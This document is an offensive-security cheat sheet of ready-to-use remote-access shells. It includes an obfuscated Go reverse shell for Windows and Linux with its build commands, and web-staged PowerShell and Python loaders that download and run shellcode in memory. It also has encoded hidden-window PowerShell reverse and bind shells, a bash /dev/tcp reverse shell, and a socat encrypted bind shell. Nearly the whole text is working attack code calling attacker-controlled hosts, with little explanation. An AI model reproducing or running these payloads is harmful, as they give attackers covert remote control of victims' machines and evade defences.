###### Shells ###### ******* Generic ******* Golang Windows & Linux reverse shell ************************************ .. code-block:: golang package main import ( "C" "bufio" "errors" "flag" "fmt" "net" "os" "os/exec" "path/filepath" "runtime" "time" ) var dst string var abc []string = []string{"a", "e", "b", "c", "s", "/"} var webreq string = "GET /" + "george" + "/kindness HTTP/1.1\r\nHost:" + " reynolds.s3.amazonaws.com\r\nUser-Agent:" + " strawberry/0.2.1\r\nAccept:" + " application/json\r\n\r\n" func GardnerFileExist(filePath string) bool { _, error := os.Stat(filePath) return !errors.Is(error, os.ErrNotExist) } //export EdwardsDial func EdwardsDial() { conn, err := net.Dial("t"+"c"+"p", dst) if err != nil { time.Sleep(time.Duration(1000 * time.Millisecond)) EdwardsDial() return } fmt.Fprintf(conn, webreq) // Fake HTTP Request bufio.NewReader(conn).ReadString('\n') // Wait for any response bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1]} if runtime.GOOS != "windows" { bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[2] + abc[0] + abc[4] + "h", "-" + "i"} if GardnerFileExist(bin[0]) { // Check if file exist testbin := []string{abc[5] + "u" + abc[4] + "r" + abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + abc[3] + "r" + "i" + "p" + "t", abc[5] + "d" + abc[1] + "v" + abc[5] + "n" + "u" + "l" + "l", "-" + "q" + abc[3], bin[0]} if GardnerFileExist(testbin[0]) { bin = testbin } } else { bin = []string{abc[5] + abc[2] + "i" + "n" + abc[5] + abc[4] + "h"} } } cmd := exec.Command(bin[0], bin[1:]...) cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn cmd.Run() } //export PalmerDetach func PalmerDetach() { cwd, _ := os.Getwd() if runtime.GOOS == "windows" { cwd, file := filepath.Split(os.Args[0]) bin := []string{abc[3] + "m" + "d" + "." + abc[1] + "x" + abc[1], abc[5] + abc[3], abc[4] + "t" + abc[0] + "r" + "t", abc[5] + abc[2], file, "-" + "-" + "child"} cmd := exec.Command(bin[0], bin[1:]...) cmd.Dir = cwd cmd.Start() cmd.Wait() } else { cmd := exec.Command(os.Args[0], "-"+"-"+"child") cmd.Dir = cwd cmd.Start() time.Sleep(time.Duration(1000 * time.Millisecond)) cmd.Process.Release() time.Sleep(time.Duration(1000 * time.Millisecond)) } } func main() { var isChild = flag.Bool("child", false, "run as child") flag.Parse() if !*isChild { PalmerDetach() // Detach program from parent terminal } else { EdwardsDial() // ReverseShell part } os.Exit(1) } .. code-block:: bash LHOST="192.168.45.245" LPORT=53 env GOOS=linux GOARCH=amd64 CGO_ENABLED=0 /usr/local/go/bin/go build -o r -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=amd64 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=386 CGO_ENABLED=0 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -o r32.exe -ldflags "-X main.dst=$LHOST:$LPORT" main.go env GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc /usr/local/go/bin/go build -ldflags "-s -w -X main.dst=$LHOST:$LPORT" -buildmode=c-shared -o r.dll main.go sudo mv r.exe r32.exe r.dll r /var/www/html/ cat <$F;chmod 755 $F;$F # Windows x86 shellcode CMD='powershell "wget 192.168.45.245/r32.exe -o $env:TEMP\r.exe;saps $env:TEMP\r.exe"' msfvenom -a x86 --platform Windows -p windows/exec CMD="$CMD" -f python -b "\x00\x20" --smallest -v shellcode EXITFUNC=thread | | DLL loader example .. code-block:: golang package main import ( "flag" "fmt" "syscall" ) func main() { var mod = syscall.NewLazyDLL("main.dll") var isChild = flag.Bool("child", false, "run as child") var proc = mod.NewProc("EdwardsDial") flag.Parse() if !*isChild { proc = mod.NewProc("PalmerDetach") } ret, _, _ := proc.Call() fmt.Printf("Return: %d\n", ret) } | ******* Windows ******* PowerShell Python Reverse TCP (web stagged) ******************************************* | You need embeddable python zip at https://www.python.org/downloads/windows/ and to serve it as python.zip .. code-block:: bash cat <<'EOF'| sudo tee /var/www/html/rs.ps1 $ip="192.168.1.163"; $port=53; $process="powershell.exe" $python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")} $arguments=@("-c","""import time,socket,os,threading,subprocess as sp;p=sp.Popen(['$process'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('$ip',$port));threading.Thread(target=exec,args=('while(True):o=os.read(p.stdout.fileno(),1024);s.send(o);time.sleep(0.01)',globals()),daemon=True).start();threading.Thread(target=exec,args=('while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i);time.sleep(0.01)',globals())).start()""") Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments EOF .. code-block:: bash sudo nc -nvlp 53 -s 192.168.1.163 .. code-block:: bash cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0 IEX(New-Object Net.WebClient).downloadString('http://192.168.1.163/rs.ps1') EOF powershell -E AAAAAAAAAAAAAA== # Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "AAAAAAAAAAAAAA==" | ShellCode w/ python (web stagged) ********************************* | ref : https://github.com/ustayready/python-pentesting/blob/master/pyinjector.py .. code-block:: bash cat <<'EOF'| xxd -plain | tr -d '\n' | rev | sudo tee /var/www/html/loadsc import ctypes as c import gzip import io import urllib.request as r def load(url): k32 = c.windll.kernel32 k32.VirtualAlloc.restype = c.c_void_p ct = k32.CreateThread ct.argtypes = ( c.c_int, c.c_int, c.c_void_p, c.c_int, c.c_int, c.POINTER(c.c_int) ) ct.restype = c.c_void_p buff = bytes.fromhex(gzip.open(io.BytesIO(r.urlopen(url).read()),'rb').read()[::-1].decode("utf-8")) lenbuff = len(buff) space = k32.VirtualAlloc(c.c_int(0),c.c_int(lenbuff),c.c_int(0x3000),c.c_int(0x40)) buff = ( c.c_char * lenbuff ).from_buffer_copy( buff ) k32.RtlMoveMemory(c.c_void_p(space),buff,c.c_int(lenbuff)) buff = "" ; del buff handle = ct(c.c_int(0),c.c_int(0),c.c_void_p(space),c.c_int(0),c.c_int(0),c.pointer(c.c_int(0))) k32.WaitForSingleObject(handle, -1); EOF | Call it with python .. code-block:: powershell &$env:TEMP\python\python.exe -c "import urllib.request as r;exec(bytes.fromhex(r.urlopen('http://192.168.1.163/loadsc').read()[::-1].decode('utf-8')));load('http://192.168.1.163/sc')" | | Or call it with Start-Process if you don't want interaction (this payload download python.zip as well) .. code-block:: bash cat <<'EOF'| sudo tee /var/www/html/loadsc.ps1 $ip="192.168.45.245"; $loadsc="http://$ip/loadsc"; $sc="http://$ip/sc" $python="http://$ip/python.zip"; $dir="$env:TEMP";$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")} $arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""") Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments EOF # IEX(New-Object Net.WebClient).downloadString('http://192.168.45.245/loadsc.ps1') | | Use donut to "convert" your exe to shellcode .. code-block:: bash pip3 install donut-shellcode --break-system-packages python3 -c "import donut; donut.create(file='SweetPotato.exe',output='/tmp/sc',params='--help')" cat /tmp/sc | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null # test : msfvenom -p windows/x64/exec CMD="calc.exe" -f raw | xxd -plain | tr -d '\n' | rev | gzip | sudo tee /var/www/html/sc >/dev/null | PowerShell Reverse TCP ********************** .. code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Generate PowerShell command to execute on target export LHOST="4.3.2.1" export LPORT="443" echo -en "\npowershell -nop -noni -w Hidden -ep Bypass -e $( echo ' $c=New-Object Net.Sockets.TcpClient("'$LHOST'",'$LPORT') $s=$c.GetStream() $sb=([Text.Encoding]::UTF8).GetBytes("PS "+(pwd).Path+"> ") $s.Write($sb,0,$sb.Length) [byte[]]$b=0..65535|%{0} while(($i=$s.Read($b,0,$b.Length)) -ne 0){ $d=(New-Object -t Text.UTF8Encoding).GetString($b,0,$i) $sb=(iex $d | Out-String) 2>&1 $sb2=$sb+"PS "+(pwd).Path+"> " $sb=([Text.Encoding]::UTF8).GetBytes($sb2) $s.Write($sb,0,$sb.Length) $s.Flush() } $c.Close() ' | iconv -f utf8 -t utf-16le | base64 -w0) \n\n" .. code-block:: powershell # Result Example powershell -nop -noni -w Hidden -ep Bypass -e CgAkAGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAiADQALgAzAC4AMgAuADEAIgAsADQANAAzACkACgAkAHMAPQAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkACgAkAHMAYgA9ACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAUABTACAAIgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAiAD4AIAAiACkACgAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgBbAGIAeQB0AGUAWwBdAF0AJABiAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQAKAHcAaABpAGwAZQAoACgAJABpAD0AJABzAC4AUgBlAGEAZAAoACQAYgAsADAALAAkAGIALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7AAoAIAAkAGQAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAHQAIABUAGUAeAB0AC4AVQBUAEYAOABFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACQAaQApAAoAIAAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApACAAMgA+ACYAMQAKACAAJABzAGIAMgA9ACQAcwBiACsAIgBQAFMAIAAiACsAKABwAHcAZAApAC4AUABhAHQAaAArACIAPgAgACIACgAgACQAcwBiAD0AKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGIAMgApAAoAIAAkAHMALgBXAHIAaQB0AGUAKAAkAHMAYgAsADAALAAkAHMAYgAuAEwAZQBuAGcAdABoACkACgAgACQAcwAuAEYAbAB1AHMAaAAoACkACgB9AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAAoA | PowerShell Reverse TCP (web stagged) ************************************ .. code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Serving PS ReverseShell on http://*:80/rs.ps1 LHOST="4.3.2.1" LPORT="443" cd $(mktemp -d) && \ echo '$client = New-Object System.Net.Sockets.TCPClient('"'$LHOST'"','$LPORT');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + '"'PSReverseShell# '"';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();'>rs.ps1 && \ sudo python3 -m http.server --cgi 80 .. code-block:: batch :: Victim, retrieve and launch rs.ps1 c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://4.3.2.1/rs.ps1') | PowerShell bind shell ********************* | .. code-block:: bash cat << 'EOF'|iconv -f UTF8 -t UTF16LE | base64 -w 0 $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',8888);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop() EOF # powershell.exe -E JABsAGkAcwB0AGUAbgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAJwAwAC4AMAAuADAALgAwACcALAA4ADgAOAA4ACkAOwAkAGwAaQBzAHQAZQBuAGUAcgAuAHMAdABhAHIAdAAoACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgACQAbABpAHMAdABlAG4AZQByAC4AQQBjAGMAZQBwAHQAVABjAHAAQwBsAGkAZQBuAHQAKAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA7ACQAbABpAHMAdABlAG4AZQByAC4AUwB0AG8AcAAoACkACgA= # nc 1.2.3.4 8888 | ***** Linux ***** Bash Reverse TCP **************** .. code-block:: bash # Attacker Listen 443 sudo nc -nvlp 443 .. code-block:: bash # Victim Connect 443 bash -c "bash -i >& /dev/tcp/4.3.2.1/443 0>&1" | Socat Bind TCP Shell (encrypted) ***************************** | Etablish an encrypted bind shell with socat and a certificate (pub+key) .. code-block:: bash # Victim - Regroup cert and key cat server.key server.crt > server.pem # Victim - Listen 443 sudo socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork EXEC:/bin/bash # Attacker - Connect 443 socat - OPENSSL:10.11.0.4:443,verify=0 #Skip certificate check |